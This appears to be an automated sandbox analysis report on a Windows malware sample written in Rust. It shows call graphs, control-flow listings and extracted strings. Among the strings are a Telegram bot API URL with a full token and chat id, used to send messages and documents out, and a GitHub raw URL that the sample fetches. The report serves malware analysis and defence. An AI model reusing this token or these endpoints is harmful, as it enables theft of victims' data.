63738->63731 63738->63734 63740 7ff6544f2680 HeapFree 63738->63740 63741 7ff65451b3e0 HeapFree 63738->63741 63742 7ff654522f88 63739->63742 63740->63738 63741->63738 63743 7ff654560750 6 API calls 63742->63743 63744 7ff654522f90 63743->63744 63745 7ff6543bc8c0 50 API calls 63744->63745 63758 7ff654522f95 63745->63758 63746 7ff654523137 63748 7ff6543bc4a0 50 API calls 63746->63748 63749 7ff654523153 63746->63749 63747 7ff65452301d WSASend 63747->63749 63750 7ff654523054 WSAGetLastError 63747->63750 63751 7ff6545231a2 63748->63751 63750->63758 63752 7ff6544f2680 HeapFree 63751->63752 63753 7ff6545231ad 63752->63753 63754 7ff654560750 6 API calls 63753->63754 63755 7ff6545231b5 63754->63755 63756 7ff6543bc8c0 50 API calls 63755->63756 63759 7ff6545231ba 63756->63759 63757 7ff654406280 90 API calls 63757->63758 63758->63746 63758->63747 63758->63749 63758->63757 63760 7ff6544f2680 HeapFree 63758->63760 63761 7ff65451b3e0 HeapFree 63758->63761 63760->63758 63761->63758 63763 7ff6544069f7 63762->63763 63764 7ff6544069ff RtlNtStatusToDosError 63763->63764 63765 7ff654406ac6 63763->63765 63768 7ff6543b5de0 51 API calls 63764->63768 63766 7ff654406ae4 63765->63766 63767 7ff654406b86 63765->63767 63772 7ff654406b59 GetLastError CloseHandle 63766->63772 63782 7ff654406b07 63766->63782 63834 7ff6543bf520 50 API calls 63767->63834 63769 7ff654406a81 63768->63769 63832 7ff6544074f0 87 API calls 63769->63832 63771 7ff654406b92 63775 7ff654406bae 63771->63775 63776 7ff654406bf8 63771->63776 63774 7ff654406ac1 63772->63774 63774->63658 63836 7ff65439a960 CloseHandle 63775->63836 63777 7ff654560750 6 API calls 63776->63777 63780 7ff654406c00 63777->63780 63778 7ff654406ab4 63781 7ff6544f2680 HeapFree 63778->63781 63784 7ff6543bc8c0 50 API calls 63780->63784 63781->63774 63785 7ff6545160d0 HeapAlloc 63782->63785 63783 7ff654406bb6 63783->63776 63791 7ff654406c05 63784->63791 63786 7ff654406b1a 63785->63786 63787 7ff654406b94 63786->63787 63788 7ff654406b1f 63786->63788 63835 7ff6543b5820 50 API calls 63787->63835 63788->63774 63833 7ff6544075d0 87 API calls 63788->63833 63791->63658 63793 7ff654406434 63792->63793 63794 7ff6544064ea 63792->63794 63800 7ff65440644c 63793->63800 63837 7ff6544f97e0 50 API calls 63793->63837 63839 7ff6544f9730 WaitOnAddress GetLastError 63794->63839 63796 7ff654406513 63799 7ff6543bb190 50 API calls 63796->63799 63798 7ff65440645d 63801 7ff65440647d 63798->63801 63838 7ff654404d70 88 API calls 63798->63838 63799->63801 63800->63796 63800->63798 63803 7ff6544064c6 63801->63803 63840 7ff6544f97e0 50 API calls 63801->63840 63803->63724 63803->63725 63841 7ff654406810 63805->63841 63808 7ff654406e68 63808->63624 63831 7ff65451c760 50 API calls 63808->63831 63861 7ff654521b30 53 API calls 63810->63861 63812 7ff654521b01 63813->63623 63814->63623 63815->63631 63816->63638 63817->63644 63818->63708 63819->63663 63820->63665 63821->63643 63822->63713 63823->63698 63824->63710 63825->63655 63826->63655 63827->63655 63828->63655 63829->63655 63830->63655 63831->63624 63832->63778 63833->63774 63835->63771 63836->63783 63837->63800 63838->63801 63839->63793 63840->63803 63842 7ff65440682d 63841->63842 63843 7ff6544068b8 63841->63843 63844 7ff654406840 63842->63844 63859 7ff6544f97e0 50 API calls 63842->63859 63858 7ff6544f9730 WaitOnAddress GetLastError 63843->63858 63846 7ff65440684e 63844->63846 63847 7ff6544068e9 63844->63847 63850 7ff654406854 63846->63850 63857 7ff654404e40 50 API calls 63846->63857 63849 7ff6543bb190 50 API calls 63847->63849 63849->63850 63851 7ff654406898 63850->63851 63860 7ff6544f97e0 50 API calls 63850->63860 63851->63808 63856 7ff654406ed0 54 API calls 63851->63856 63854 7ff654406869 63854->63850 63855 7ff6544f2680 HeapFree 63854->63855 63855->63850 63856->63808 63857->63854 63858->63842 63859->63844 63860->63851 63861->63812
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Client::new()$Pending error polled more than once$V$W$called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$chat_iddocument$https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$nown$size overflows MAX_SIZE$tv$xi$j
                                            • API String ID: 0-1257920799
                                            • Opcode ID: cea77f800d10a777f30bdc393cede84b9eea5955593df3c88aca81e6a8665f9e
                                            • Instruction ID: 3d3f6e3f1956bc20350e832f71965f4e5510f7a820b2856edddb74028f3029d5
                                            • Opcode Fuzzy Hash: cea77f800d10a777f30bdc393cede84b9eea5955593df3c88aca81e6a8665f9e
                                            • Instruction Fuzzy Hash: 9C232932A0CBC681EB718B15E4953EAB3A5FB84784F484175DA8C63BA9DF7DD149CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: V$W$chat_iddocument$https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$nown$size overflows MAX_SIZE$tv$xi$j
                                            • API String ID: 4250714341-4120944697
                                            • Opcode ID: 746a26b679a7cebb0f44662a5ab6fa12e56d34dd68331c5f3b3120e9f26e602d
                                            • Instruction ID: 268e82ee7561170f0e8851bec12c7acac36bde5ee2fb3fdfcbcbbea12eeacb1e
                                            • Opcode Fuzzy Hash: 746a26b679a7cebb0f44662a5ab6fa12e56d34dd68331c5f3b3120e9f26e602d
                                            • Instruction Fuzzy Hash: 90F24A32A0CBC680EB718B15E4953EAB3A5FB84784F484175DA8C53BA9DF7DD189CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeapmemcpy
                                            • String ID: V$https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$nown$tv$xi$j
                                            • API String ID: 673829100-3382795902
                                            • Opcode ID: 8aaf3b555338c0ee81e73ba18b056a506734bec5462bb3cbe409f90fcbda6893
                                            • Instruction ID: 0ffffa5c3dbfc67cf7bc14ac5edb2f2b78440f5d1c1028669c4c7b8a20ba48b5
                                            • Opcode Fuzzy Hash: 8aaf3b555338c0ee81e73ba18b056a506734bec5462bb3cbe409f90fcbda6893
                                            • Instruction Fuzzy Hash: BDA26D32A0CAC681EB71DB16E4943EE63A4FB84784F484175DA8DA3BA9DF3DD149C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1250 7ff6543acf27-7ff6543acf36 1251 7ff6543aeae5-7ff6543aeafa 1250->1251 1252 7ff6543acf3c-7ff6543acf5f call 7ff654495c20 1250->1252 1253 7ff6543aeb00-7ff6543aeb14 1251->1253 1254 7ff6543b2987-7ff6543b29a4 call 7ff6543bc4c0 1251->1254 1256 7ff6543aeb19-7ff6543aeb44 memcpy call 7ff654396ea0 1252->1256 1259 7ff6543acf65-7ff6543acf72 1252->1259 1253->1256 1264 7ff6543b5245 1254->1264 1266 7ff6543aeb69 1256->1266 1267 7ff6543aeb46-7ff6543aeb67 call 7ff65440e180 HeapFree 1256->1267 1262 7ff6543b4036-7ff6543b42be 1259->1262 1270 7ff6543b42c0-7ff6543b42c8 call 7ff654397820 1262->1270 1271 7ff6543b42cd-7ff6543b42da 1262->1271 1268 7ff6543aeb76-7ff6543aeb86 1266->1268 1269 7ff6543aeb71 call 7ff654397360 1266->1269 1267->1268 1277 7ff6543aeb88-7ff6543aeb94 call 7ff65439b750 1268->1277 1278 7ff6543aeb99-7ff6543aebf3 call 7ff654397d10 1268->1278 1269->1268 1270->1271 1274 7ff6543b42e9-7ff6543b42fc 1271->1274 1275 7ff6543b42dc-7ff6543b42e4 call 7ff654397820 1271->1275 1284 7ff6543b3fe5-7ff6543b3fe9 1274->1284 1285 7ff6543b4302-7ff6543b4314 HeapFree 1274->1285 1275->1274 1277->1278 1286 7ff6543aeca3-7ff6543aecad 1278->1286 1287 7ff6543aebf9-7ff6543aec15 1278->1287 1288 7ff6543b4004-7ff6543b4011 1284->1288 1289 7ff6543b3feb-7ff6543b3ff0 1284->1289 1285->1284 1293 7ff6543aeec4-7ff6543aef38 call 7ff654514af0 1286->1293 1294 7ff6543aecb3-7ff6543aecc6 HeapFree 1286->1294 1291 7ff6543aec88-7ff6543aeca1 1287->1291 1292 7ff6543aec17-7ff6543aec3e 1287->1292 1296 7ff6543b4025-7ff6543b4031 call 7ff654560750 1288->1296 1297 7ff6543b4013-7ff6543b4020 HeapFree 1288->1297 1289->1288 1295 7ff6543b3ff2-7ff6543b3fff HeapFree 1289->1295 1291->1286 1300 7ff6543aeccb-7ff6543aecd6 1291->1300 1298 7ff6543aec40-7ff6543aec4d call 7ff6543c9bb0 1292->1298 1299 7ff6543aec55-7ff6543aec86 1292->1299 1312 7ff6543aef3e-7ff6543aef43 1293->1312 1313 7ff6543b25ac-7ff6543b25b8 call 7ff6543bf520 1293->1313 1294->1293 1295->1288 1296->1262 1297->1296 1298->1299 1299->1291 1305 7ff6543aed03-7ff6543aed4e 1299->1305 1302 7ff6543aece9-7ff6543aecee 1300->1302 1307 7ff6543aece0-7ff6543aece7 1302->1307 1308 7ff6543aecf0-7ff6543aed01 HeapFree 1302->1308 1309 7ff6543aed54-7ff6543aed5e 1305->1309 1310 7ff6543aee93-7ff6543aee9c 1305->1310 1307->1286 1307->1302 1308->1307 1316 7ff6543aed70-7ff6543aed84 1309->1316 1317 7ff6543aee9e-7ff6543aeeaf HeapFree 1310->1317 1318 7ff6543aeeb4-7ff6543aeebc 1310->1318 1314 7ff6543aef45-7ff6543aef51 HeapFree 1312->1314 1315 7ff6543aef56-7ff6543aef60 1312->1315 1313->1264 1314->1315 1320 7ff6543aef74-7ff6543aef81 1315->1320 1321 7ff6543aef62-7ff6543aef6f HeapFree 1315->1321 1322 7ff6543aee47-7ff6543aee4a 1316->1322 1323 7ff6543aed8a-7ff6543aedad 1316->1323 1317->1318 1318->1293 1326 7ff6543aef95-7ff6543aef9f 1320->1326 1327 7ff6543aef83-7ff6543aef90 HeapFree 1320->1327 1321->1320 1322->1310 1325 7ff6543aee4c-7ff6543aee67 1322->1325 1328 7ff6543aedaf-7ff6543aedc4 call 7ff6543c9bb0 1323->1328 1329 7ff6543aedcc-7ff6543aedea 1323->1329 1330 7ff6543aee79-7ff6543aee7e 1325->1330 1331 7ff6543aefa1-7ff6543aefae HeapFree 1326->1331 1332 7ff6543aefb3-7ff6543af019 call 7ff654514af0 1326->1332 1327->1326 1328->1329 1334 7ff6543aee07-7ff6543aee2b memcpy 1329->1334 1335 7ff6543aedec-7ff6543aedff call 7ff6543f70d0 1329->1335 1338 7ff6543aee70-7ff6543aee77 1330->1338 1339 7ff6543aee80-7ff6543aee91 HeapFree 1330->1339 1331->1332 1343 7ff6543af01e-7ff6543af022 1332->1343 1336 7ff6543aed60-7ff6543aed6a 1334->1336 1337 7ff6543aee31-7ff6543aee42 HeapFree 1334->1337 1335->1334 1336->1310 1336->1316 1337->1336 1338->1310 1338->1330 1339->1338 1345 7ff6543af027-7ff6543af056 call 7ff6543a3990 1343->1345 1347 7ff6543af05b-7ff6543af09c memcpy 1345->1347 1349 7ff6543af0d0-7ff6543af210 call 7ff654397c50 call 7ff6545160d0 1347->1349 1350 7ff6543af09e-7ff6543af0ba call 7ff654396ea0 1347->1350 1363 7ff6543b2952-7ff6543b2961 call 7ff6543b57c0 1349->1363 1364 7ff6543af216-7ff6543af49a call 7ff65440e180 HeapFree call 7ff6543b5de0 memcpy call 7ff65440f810 call 7ff654410e70 call 7ff6543a16b0 call 7ff6543b5de0 memcpy 1349->1364 1355 7ff6543af0c8 1350->1355 1356 7ff6543af0bc-7ff6543af0c3 call 7ff65439b750 1350->1356 1355->1349 1356->1355 1363->1264 1382 7ff6543af4b2-7ff6543af4ba 1364->1382 1383 7ff6543af49c-7ff6543af4ad HeapFree 1364->1383 1384 7ff6543af4c0 1382->1384 1385 7ff6543af564-7ff6543af5a3 call 7ff6543e4dd0 call 7ff6545160d0 1382->1385 1383->1382 1387 7ff6543af672-7ff6543af6e6 memcpy call 7ff65449c6a0 memcpy * 2 1384->1387 1400 7ff6543b2b22-7ff6543b2b31 call 7ff6543b5820 1385->1400 1401 7ff6543af5a9-7ff6543af5f5 call 7ff6545160d0 1385->1401 1392 7ff6543acf93-7ff6543acfa3 call 7ff654495c20 1387->1392 1393 7ff6543af6ec-7ff6543af706 1387->1393 1399 7ff6543acfa8-7ff6543acfbe 1392->1399 1395 7ff6543af70c-7ff6543af94e memcpy call 7ff654396ea0 call 7ff6545160d0 1393->1395 1420 7ff6543af950-7ff6543af95c call 7ff65439b750 1395->1420 1421 7ff6543af961-7ff6543af96b 1395->1421 1399->1393 1399->1395 1400->1264 1410 7ff6543b2b36-7ff6543b2b45 call 7ff6543b5820 1401->1410 1411 7ff6543af5fb-7ff6543af66a call 7ff654392730 1401->1411 1410->1264 1411->1387 1420->1421 1423 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 1421->1423 1424 7ff6543af96d-7ff6543af97a HeapFree 1421->1424 1432 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 1423->1432 1433 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 1423->1433 1424->1423 1438 7ff6543afa35 1432->1438 1439 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 1432->1439 1445 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 1433->1445 1446 7ff6543afb38-7ff6543afb40 call 7ff654397360 1433->1446 1438->1433 1439->1438 1455 7ff6543afbdf-7ff6543afbed HeapFree 1445->1455 1456 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 1445->1456 1446->1445 1455->1456 1465 7ff6543b0062-7ff6543b006a call 7ff654397360 1456->1465 1466 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 1456->1466 1465->1466 1473 7ff6543b0139-7ff6543b198d call 7ff654514af0 1466->1473 1474 7ff6543b011a-7ff6543b0133 memcmp 1466->1474 1478 7ff6543b19a0-7ff6543b19b7 1473->1478 1479 7ff6543b198f-7ff6543b199b HeapFree 1473->1479 1474->1473 1480 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 1478->1480 1481 7ff6543b19ca-7ff6543b19d6 1478->1481 1479->1478 1480->1481 1481->1424 1483 7ff6543b19dc 1481->1483 1483->1423
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap$memcpy
                                            • String ID: V$https://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendMessagehttps://api.telegram.org/bot7080012970:AAFY18TRX89Y_dAwP1Ulb_WhKvCNNODQ-w0/sendDocument985314977$https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$nown$xi$j
                                            • API String ID: 1887603139-1714493280
                                            • Opcode ID: 25ce228b5f7c71a651ca52b569e52b9e943e110bdb2b10317cdd634e0fb961aa
                                            • Instruction ID: 0f7ef9ade489805a2ee6864ead32d95ac1127bfff4f60ffb68ba5908899debda
                                            • Opcode Fuzzy Hash: 25ce228b5f7c71a651ca52b569e52b9e943e110bdb2b10317cdd634e0fb961aa
                                            • Instruction Fuzzy Hash: 2F726A32A08BC681EB60DB12E4943EE77A4FB84784F484176DA8D93BA9DF7DD149C740
                                            APIs
                                            Strings
                                            • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF65452252E, 00007FF65452296F
                                            • A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6545227B5
                                            • A Tokio 1.x context was found, but it is being shutdown.C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\io\scheduled_io.rs, xrefs: 00007FF654521E99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorLastclosesocketmemcpyrecv
                                            • String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$A Tokio 1.x context was found, but it is being shutdown.C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.36.0\src\runtime\io\scheduled_io.rs$called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1438857626-1630406791
                                            • Opcode ID: 1a0429f8fd4b31fa50f4b56c8e3ca4f129a33fe84985245194d18726a27546b2
                                            • Instruction ID: ba26c03a1ac6b498adc49129e88e98dc16e8375aae1e042658275417b1c6dc82
                                            • Opcode Fuzzy Hash: 1a0429f8fd4b31fa50f4b56c8e3ca4f129a33fe84985245194d18726a27546b2
                                            • Instruction Fuzzy Hash: 3DA2E736A0C68181EA759B11E8A03FA63A0FF95794F484276EE9DA77D5DF3CE085C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1975 7ff6543b0dd1-7ff6543b0df0 1976 7ff6543b0df2-7ff6543b0df5 1975->1976 1977 7ff6543b0dfa-7ff6543b0e1e 1975->1977 1976->1977 1978 7ff6543b0e20-7ff6543b0e23 1977->1978 1979 7ff6543b0e28-7ff6543b0e33 1977->1979 1978->1979 1980 7ff6543b1cc0-7ff6543b1ccf 1979->1980 1981 7ff6543b0e39-7ff6543b0e41 call 7ff65451ab60 1979->1981 1983 7ff6543b1cd5-7ff6543b1cdf call 7ff654399ce0 1980->1983 1984 7ff6543b2627-7ff6543b2633 call 7ff6543bf5a0 1980->1984 1989 7ff6543b0e47-7ff6543b0e6c 1981->1989 1990 7ff6543b2d9a-7ff6543b2dc6 call 7ff6543bb190 1981->1990 1993 7ff6543b2d14-7ff6543b2d4c 1983->1993 1994 7ff6543b1ce5-7ff6543b1d85 call 7ff6543998d0 1983->1994 1992 7ff6543b5245 1984->1992 1995 7ff6543b0eef-7ff6543b0efa 1989->1995 1996 7ff6543b0e72-7ff6543b0e92 1989->1996 1990->1992 2009 7ff6543b2d4e-7ff6543b2d5e 1993->2009 2010 7ff6543b2d69-7ff6543b2d95 call 7ff6543bb190 1993->2010 2008 7ff6543b1d90-7ff6543b1dd7 1994->2008 1995->1994 2002 7ff6543b0f00-7ff6543b0f46 1995->2002 1999 7ff6543b0ee0-7ff6543b0eed 1996->1999 2000 7ff6543b0e94-7ff6543b0eba 1996->2000 1999->1995 1999->1999 2005 7ff6543b0ec0-7ff6543b0ed2 2000->2005 2006 7ff6543b1b9c-7ff6543b1be2 call 7ff6543998d0 2002->2006 2005->2005 2011 7ff6543b0ed4-7ff6543b0eda 2005->2011 2016 7ff6543b1c70 2006->2016 2017 7ff6543b1be8 2006->2017 2024 7ff6543b1e70-7ff6543b1e73 2008->2024 2025 7ff6543b1ddd-7ff6543b1e01 2008->2025 2009->2010 2010->1992 2011->1995 2015 7ff6543b0edc 2011->2015 2015->1999 2016->2016 2020 7ff6543b1bf0-7ff6543b1bf6 2017->2020 2022 7ff6543b1bf8-7ff6543b1c0d 2020->2022 2023 7ff6543b1b79-7ff6543b1b96 2020->2023 2026 7ff6543b1c0f-7ff6543b1c1f 2022->2026 2027 7ff6543b1c23-7ff6543b1c25 2022->2027 2023->1994 2023->2006 2029 7ff6543b2593-7ff6543b25a7 call 7ff6543bf520 2024->2029 2030 7ff6543b1e79-7ff6543b1e7c 2024->2030 2025->2024 2033 7ff6543b1e03-7ff6543b1e19 2025->2033 2026->2020 2031 7ff6543b1c21 2026->2031 2032 7ff6543b1c30-7ff6543b1c41 2027->2032 2029->1992 2030->2008 2031->2016 2032->2023 2035 7ff6543b1c47-7ff6543b1c4a 2032->2035 2033->2024 2039 7ff6543b1e1b-7ff6543b1e54 memcmp 2033->2039 2035->2029 2038 7ff6543b1c50-7ff6543b1c6a 2035->2038 2038->2032 2039->2024 2040 7ff6543b1e56-7ff6543b2393 2039->2040 2043 7ff6543b2395 call 7ff6543f5f30 2040->2043 2044 7ff6543b239a-7ff6543b23f5 2040->2044 2043->2044 2046 7ff6543b2732-7ff6543b2741 call 7ff6543b8700 2044->2046 2047 7ff6543b23fb-7ff6543b254b 2044->2047 2046->1992 2051 7ff6543b2551-7ff6543b256c 2047->2051 2052 7ff6543af672-7ff6543af6e6 memcpy call 7ff65449c6a0 memcpy * 2 2047->2052 2051->2052 2056 7ff6543acf93-7ff6543acfa3 call 7ff654495c20 2052->2056 2057 7ff6543af6ec-7ff6543af706 2052->2057 2061 7ff6543acfa8-7ff6543acfbe 2056->2061 2058 7ff6543af70c-7ff6543af94e memcpy call 7ff654396ea0 call 7ff6545160d0 2057->2058 2070 7ff6543af950-7ff6543af95c call 7ff65439b750 2058->2070 2071 7ff6543af961-7ff6543af96b 2058->2071 2061->2057 2061->2058 2070->2071 2073 7ff6543af97f-7ff6543afa0f call 7ff654397f10 call 7ff6543a3990 memcpy 2071->2073 2074 7ff6543af96d-7ff6543af97a HeapFree 2071->2074 2082 7ff6543afa11-7ff6543afa2a call 7ff654396ea0 2073->2082 2083 7ff6543afa3c-7ff6543afb36 memcpy * 3 call 7ff6543a18f0 2073->2083 2074->2073 2088 7ff6543afa35 2082->2088 2089 7ff6543afa2c-7ff6543afa30 call 7ff65439b750 2082->2089 2095 7ff6543afb53-7ff6543afbd9 call 7ff65440f810 call 7ff654410e70 2083->2095 2096 7ff6543afb38-7ff6543afb40 call 7ff654397360 2083->2096 2088->2083 2089->2088 2105 7ff6543afbdf-7ff6543afbed HeapFree 2095->2105 2106 7ff6543aff08-7ff6543b0060 memcpy * 2 call 7ff654398a50 memcpy * 4 call 7ff6543a18f0 2095->2106 2096->2095 2105->2106 2115 7ff6543b0062-7ff6543b006a call 7ff654397360 2106->2115 2116 7ff6543b007d-7ff6543b0118 call 7ff6545160d0 2106->2116 2115->2116 2123 7ff6543b0139-7ff6543b198d call 7ff654514af0 2116->2123 2124 7ff6543b011a-7ff6543b0133 memcmp 2116->2124 2128 7ff6543b19a0-7ff6543b19b7 2123->2128 2129 7ff6543b198f-7ff6543b199b HeapFree 2123->2129 2124->2123 2130 7ff6543b19b9-7ff6543b19c5 call 7ff65439b750 2128->2130 2131 7ff6543b19ca-7ff6543b19d6 2128->2131 2129->2128 2130->2131 2131->2074 2133 7ff6543b19dc 2131->2133 2133->2073
                                            Strings
                                            • size overflows MAX_SIZE, xrefs: 00007FF6543B2D75
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF6543B2DA6
                                            • tv, xrefs: 00007FF6543B5247
                                            • https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt, xrefs: 00007FF6543AF995
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
